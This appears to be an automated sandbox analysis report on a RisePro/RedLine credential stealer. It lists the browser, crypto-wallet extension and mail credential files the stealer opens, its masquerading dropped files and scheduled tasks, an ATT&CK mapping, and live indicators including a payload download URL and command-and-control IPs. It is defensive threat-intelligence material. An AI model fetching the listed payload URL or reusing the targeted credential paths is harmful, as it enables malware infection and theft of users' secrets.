        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CFBA25A GetSystemTimeAsFileTime,__aulldiv,0_2_6CFBA25A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,2_2_004E06D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_004E06D0 CreateDirectoryA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetCurrentHwProfileA,GetModuleHandleExA,GetModuleFileNameA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetComputerNameA,GetUserNameA,GetDesktopWindow,GetWindowRect,GetUserDefaultLocaleName,GetKeyboardLayoutList,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,GetLocalTime,GetSystemTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,GetSystemInfo,GlobalMemoryStatusEx,EnumDisplayDevicesA,EnumDisplayDevicesA,CreateToolhelp32Snapshot,Process32First,Process32Next,Process32Next,CloseHandle,RegOpenKeyExA,RegEnumKeyExA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,RegCloseKey,2_2_004E06D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 2_2_00544C30 GetVersionExA,GetFileAttributesW,GetFileAttributesA,2_2_00544C30
        Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Stealing of Sensitive Information

        barindex
        Yara detected Clipboard Hijacker
        Source: Yara matchFile source: 8.2.q2xutezn4kFdLk2viqDb.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 22.2.EdgeMS2.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 18.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 21.2.AdobeUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 9.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 15.2.oobeldr.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.MSIUpdaterV2.exe.400000.0.unpack, type: UNPACKEDPE
        Yara detected RisePro Stealer
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3mPJKgsigfIE_SLZsizIH3r.zip, type: DROPPED
        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_blnieiiffboillknjnepogjhkgnoapac_0.indexeddb.leveldb\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\signons.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\signons.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\kpfopkelmapcoipemfendmdcghnegimn\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne\CURRENTJump to behavior
        Tries to steal Mail credentials (via file / registry access)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 4944, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Yara detected RisePro Stealer
        Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\3mPJKgsigfIE_SLZsizIH3r.zip, type: DROPPED
        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_6CF6A0C0 CorBindToRuntimeEx,GetModuleHandleW,GetModuleHandleW,__cftoe,GetModuleHandleW,GetProcAddress,0_2_6CF6A0C0

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts22
        Native API        		1
        DLL Side-Loading        		1
        DLL Side-Loading        		1
        Disable or Modify Tools        		1
        OS Credential Dumping        		12
        System Time Discovery        		Remote Services1
        Archive Collected Data        		12
        Ingress Tool Transfer        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Shared Modules        		1
        Scheduled Task/Job        		511
        Process Injection        		1
        Deobfuscate/Decode Files or Information        		LSASS Memory1
        Account Discovery        		Remote Desktop Protocol1
        Data from Local System        		21
        Encrypted Channel        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts2
        Command and Scripting Interpreter        		21
        Registry Run Keys / Startup Folder        		1
        Scheduled Task/Job        		4
        Obfuscated Files or Information        		Security Account Manager2
        File and Directory Discovery        		SMB/Windows Admin Shares1
        Screen Capture        		1
        Non-Standard Port        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts1
        Scheduled Task/Job        		Login Hook21
        Registry Run Keys / Startup Folder        		12
        Software Packing        		NTDS148
        System Information Discovery        		Distributed Component Object Model1
        Email Collection        		2
        Non-Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Timestomp        		LSA Secrets861
        Security Software Discovery        		SSHKeylogging23
        Application Layer Protocol        		Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        DLL Side-Loading        		Cached Domain Credentials451
        Virtualization/Sandbox Evasion        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
        Masquerading        		DCSync2
        Process Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job451
        Virtualization/Sandbox Evasion        		Proc Filesystem1
        Application Window Discovery        		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt511
        Process Injection        		/etc/passwd and /etc/shadow1
        System Owner/User Discovery        		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
        System Network Configuration Discovery        		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1446851 Sample: file.exe Startdate: 23/05/2024 Architecture: WINDOWS Score: 100 63 ipinfo.io 2->63 65 db-ip.com 2->65 79 Snort IDS alert for network traffic 2->79 81 Malicious sample detected (through community Yara rule) 2->81 83 Antivirus detection for URL or domain 2->83 85 11 other signatures 2->85 10 file.exe 2 2->10         started        14 MSIUpdaterV2.exe 2->14         started        16 oobeldr.exe 2->16         started        18 4 other processes 2->18 signatures3 process4 file5 59 C:\Users\user\AppData\...\Protect544cd51a.dll, PE32 10->59 dropped 99 Detected unpacking (changes PE section rights) 10->99 101 Query firmware table information (likely to detect VMs) 10->101 103 Tries to detect sandboxes and other dynamic analysis tools (window names) 10->103 109 8 other signatures 10->109 20 RegSvcs.exe 1 92 10->20         started        25 RegSvcs.exe 10->25         started        105 Antivirus detection for dropped file 14->105 107 Multi AV Scanner detection for dropped file 14->107 27 schtasks.exe 1 14->27         started        29 schtasks.exe 1 16->29         started        signatures6 process7 dnsIp8 67 185.172.128.136, 49730, 49734, 50500 NADYMSS-ASRU Russian Federation 20->67 69 185.172.128.82, 49733, 80 NADYMSS-ASRU Russian Federation 20->69 71 2 other IPs or domains 20->71 51 C:\Users\user\...\q2xutezn4kFdLk2viqDb.exe, MS-DOS 20->51 dropped 53 C:\Users\user\AppData\Local\...dgeMS2.exe, MS-DOS 20->53 dropped 55 C:\Users\user\AppData\Local\...\l2[1].exe, MS-DOS 20->55 dropped 57 3 other malicious files 20->57 dropped 87 Tries to steal Mail credentials (via file / registry access) 20->87 89 Tries to harvest and steal browser information (history, passwords, etc) 20->89 31 q2xutezn4kFdLk2viqDb.exe 1 20->31         started        35 schtasks.exe 1 20->35         started        37 schtasks.exe 1 20->37         started        91 Found evasive API chain (may stop execution after checking mutex) 25->91 93 Found stalling execution ending in API Sleep call 25->93 95 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 25->95 97 3 other signatures 25->97 39 conhost.exe 27->39         started        41 conhost.exe 29->41         started        file9 signatures10 process11 file12 61 C:\Users\user\AppData\Roaming\...\oobeldr.exe, MS-DOS 31->61 dropped 73 Antivirus detection for dropped file 31->73 75 Multi AV Scanner detection for dropped file 31->75 77 Detected unpacking (changes PE section rights) 31->77 43 schtasks.exe 1 31->43         started        45 conhost.exe 35->45         started        47 conhost.exe 37->47         started        signatures13 process14 process15 49 conhost.exe 43->49         started       

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        file.exe29%ReversingLabs
        file.exe100%AviraTR/Crypt.XPACK.Gen
        file.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\l2[1].exe100%AviraHEUR/AGEN.1304053
        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe100%AviraHEUR/AGEN.1304053
        C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe100%AviraHEUR/AGEN.1304053
        C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe100%AviraHEUR/AGEN.1304053
        C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe100%AviraHEUR/AGEN.1304053
        C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe100%AviraHEUR/AGEN.1304053
        C:\ProgramData\MSIUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\MSIUpdaterV2.exe66%ReversingLabsWin32.Trojan.RedLine
        C:\Users\user\AppData\Local\AdobeUpdaterV2_45c48cce2e2d7fbdea1afc51c7c6ad26\AdobeUpdaterV2.exe66%ReversingLabsWin32.Trojan.RedLine
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\l2[1].exe66%ReversingLabsWin32.Trojan.RedLine
        C:\Users\user\AppData\Local\Temp\EdgeMS2_45c48cce2e2d7fbdea1afc51c7c6ad26\EdgeMS2.exe66%ReversingLabsWin32.Trojan.RedLine
        C:\Users\user\AppData\Local\Temp\Protect544cd51a.dll0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\span9T_JAyVodxF8\q2xutezn4kFdLk2viqDb.exe66%ReversingLabsWin32.Trojan.RedLine
        C:\Users\user\AppData\Roaming\Microsoft\Protect\oobeldr.exe66%ReversingLabsWin32.Trojan.RedLine

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF0%URL Reputationsafe
        https://sectigo.com/CPS00%URL Reputationsafe
        http://ocsp.sectigo.com00%URL Reputationsafe
        https://db-ip.com/0%URL Reputationsafe
        https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll0%URL Reputationsafe
        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=0%URL Reputationsafe
        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK20160%URL Reputationsafe
        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e170%URL Reputationsafe
        https://www.ecosia.org/newtab/0%URL Reputationsafe
        https://ipinfo.io/Mozilla/5.00%URL Reputationsafe
        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br0%URL Reputationsafe
        https://ac.ecosia.org/autocomplete?q=0%URL Reputationsafe
        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
        https://ipinfo.io/0%URL Reputationsafe
        https://www.maxmind.com/en/locate-my-ip-address0%URL Reputationsafe
        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install0%URL Reputationsafe
        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search0%URL Reputationsafe
        http://www.winimage.com/zLibDll0%URL Reputationsafe
        https://support.mozilla.org0%URL Reputationsafe
        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples0%URL Reputationsafe
        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%URL Reputationsafe
        https://duckduckgo.com/chrome_newtab0%Avira URL Cloudsafe
        https://ipinfo.io:443/widget/demo/8.46.123.1750%Avira URL Cloudsafe
        http://185.172.128.82/server/k/l2.exe-u0%Avira URL Cloudsafe
        http://185.172.128.82/server/k/l2.exeR00%Avira URL Cloudsafe
        https://t.me/RiseProSUPPORT0%Avira URL Cloudsafe
        https://duckduckgo.com/ac/?q=0%Avira URL Cloudsafe
        https://www.google.com/images/branding/product/ico/googleg_lodp.ico0%Avira URL Cloudsafe
        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=0%Avira URL Cloudsafe
        https://db-ip.com/demo/home.php?s=8.46.123.17500%Avira URL Cloudsafe
        https://t.me/risepro_bot0%Avira URL Cloudsafe
        https://t.me/risepro_botlater3.1750%Avira URL Cloudsafe
        https://db-ip.com:443/demo/home.php?s=8.46.123.1750%Avira URL Cloudsafe
        https://ipinfo.io/widget/demo/8.46.123.1750%Avira URL Cloudsafe
        https://t.me/risepro_bot%00%Avira URL Cloudsafe
        http://185.172.128.82/server/k/l2.exe100%Avira URL Cloudmalware
        http://185.172.128.82/server/k/l2.exe~u0%Avira URL Cloudsafe
        https://db-ip.com/demo/home.php?s=8.46.123.1750%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        ipinfo.io
        		34.117.186.192
        		truefalse
          		unknown
          db-ip.com
          		104.26.4.15
          		truefalse
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://ipinfo.io/widget/demo/8.46.123.175false
            • Avira URL Cloud: safe
            		unknown
            http://185.172.128.82/server/k/l2.exetrue
            • Avira URL Cloud: malware
            		unknown
            https://db-ip.com/demo/home.php?s=8.46.123.175false
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://duckduckgo.com/chrome_newtabAhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://ipinfo.io:443/widget/demo/8.46.123.175RegSvcs.exe, 00000002.00000002.4087471947.0000000000DE4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF3b6N2Xdh3CYwplaces.sqlite.2.drfalse
            • URL Reputation: safe
            		unknown
            https://duckduckgo.com/ac/?q=AhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            https://sectigo.com/CPS0MSIUpdaterV2.exe, 00000007.00000003.1815920004.0000000002851000.00000004.00000020.00020000.00000000.sdmp, q2xutezn4kFdLk2viqDb.exe, 00000008.00000003.1809134495.000000000282E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, q2xutezn4kFdLk2viqDb.exe.2.dr, oobeldr.exe.8.dr, MSIUpdaterV2.exe.2.drfalse
            • URL Reputation: safe
            		unknown
            http://185.172.128.82/server/k/l2.exeR0RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.icoAhUc0FWfOlxwWeb Data.2.dr, hC03xPYOkhc5Web Data.2.dr, wi06D4NAVLzfWeb Data.2.drfalse
            • Avira URL Cloud: safe
            		unknown
            http://ocsp.sectigo.com0MSIUpdaterV2.exe, 00000007.00000003.1815920004.0000000002851000.00000004.00000020.00020000.00000000.sdmp, q2xutezn4kFdLk2viqDb.exe, 00000008.00000003.1809134495.000000000282E000.00000004.00000020.00020000.00000000.sdmp, l2[1].exe.2.dr, q2xutezn4kFdLk2viqDb.exe.2.dr, oobeldr.exe.8.dr, MSIUpdaterV2.exe.2.drfalse
            • URL Reputation: safe
            		unknown
            https://db-ip.com/RegSvcs.exe, 00000002.00000002.4087471947.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://185.172.128.82/server/k/l2.exe-uRegSvcs.exe, 00000002.00000002.4088382278.0000000005140000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dllfile.exe, 00000000.00000002.1650745382.00000000052F5000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.1650745382.00000000045C1000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000002.00000002.4085512591.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
